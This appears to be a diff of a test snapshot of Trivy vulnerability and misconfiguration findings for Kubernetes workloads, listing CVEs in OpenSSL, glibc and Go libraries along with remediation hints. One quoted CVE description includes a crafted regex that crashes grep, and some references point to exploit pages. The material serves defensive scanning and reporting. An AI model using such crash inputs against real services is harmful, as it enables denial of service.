"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", + "https://security.gentoo.org/glsa/202012-13", + "https://security.netapp.com/advisory/ntap-20201218-0005/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://ubuntu.com/security/notices/USN-4662-1", + "https://ubuntu.com/security/notices/USN-4745-1", + "https://www.cve.org/CVERecord?id=CVE-2020-1971", + "https://www.debian.org/security/2020/dsa-4807", + "https://www.openssl.org/news/secadv/20201208.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2021.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2020-11", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "openssl: EDIPARTYNAME NULL pointer de-reference", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", + "value": "https://avd.aquasec.com/nvd/cve-2020-1971", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", + "value": "http://www.openwall.com/lists/oss-security/2021/09/14/2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "value": "https://access.redhat.com/security/cve/CVE-2020-1971", }, { "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", }, { "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://linux.oracle.com/cve/CVE-2020-1971.html", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://linux.oracle.com/errata/ELSA-2021-9150.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", - ], - }, - "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://security.gentoo.org/glsa/202012-13", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://security.netapp.com/advisory/ntap-20201218-0005/", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://ubuntu.com/security/notices/USN-4662-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://ubuntu.com/security/notices/USN-4745-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1971", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://www.debian.org/security/2020/dsa-4807", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://www.openssl.org/news/secadv/20201208.txt", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2020-11", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-28948", - "installedVersion": "v3.0.0-20210107192922-496545a6307b", - "packageName": "gopkg.in/yaml.v3", + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23841", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28948", - "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", - "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", - "https://github.com/go-yaml/yaml/issues/666", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", - "https://security.netapp.com/advisory/ntap-20220923-0006/", - "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "http://seclists.org/fulldisclosure/2021/May/67", + "http://seclists.org/fulldisclosure/2021/May/68", + "http://seclists.org/fulldisclosure/2021/May/70", + "https://access.redhat.com/security/cve/CVE-2021-23841", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://linux.oracle.com/cve/CVE-2021-23841.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://support.apple.com/kb/HT212528", + "https://support.apple.com/kb/HT212529", + "https://support.apple.com/kb/HT212534", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-4745-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", ], }, "category": "Vulnerability", - "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "crash when attempting to deserialize invalid input", + "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28948", + "value": "https://avd.aquasec.com/nvd/cve-2021-23841", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28948", + "value": "http://seclists.org/fulldisclosure/2021/May/67", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "value": "http://seclists.org/fulldisclosure/2021/May/68", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "value": "http://seclists.org/fulldisclosure/2021/May/70", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/issues/666", + "value": "https://access.redhat.com/security/cve/CVE-2021-23841", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'coredns' of Deployment 'coredns' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV022", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv022", - ], - }, - "category": "Misconfiguration", - "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", - "name": "Non-default capabilities added(Container 'coredns' of Deployment 'coredns' should not set 'securityContext.capabilities.add')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv022", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://support.apple.com/kb/HT212528", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", - "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", - ], - }, - "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://support.apple.com/kb/HT212529", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "https://support.apple.com/kb/HT212534", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://ubuntu.com/security/notices/USN-4738-1", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://ubuntu.com/security/notices/USN-4745-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://www.debian.org/security/2021/dsa-4855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-03", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", + "fixedVersion": "1.1.1k-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3449", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "https://access.redhat.com/security/cve/CVE-2021-3449", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "https://linux.oracle.com/cve/CVE-2021-3449.html", + "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210326-0006/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "https://ubuntu.com/security/notices/USN-4891-1", + "https://ubuntu.com/security/notices/USN-5038-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "https://www.debian.org/security/2021/dsa-4875", + "https://www.openssl.org/news/secadv/20210325.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-05", + "https://www.tenable.com/security/tns-2021-06", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "description": "An OpenSSL TLS server may crash 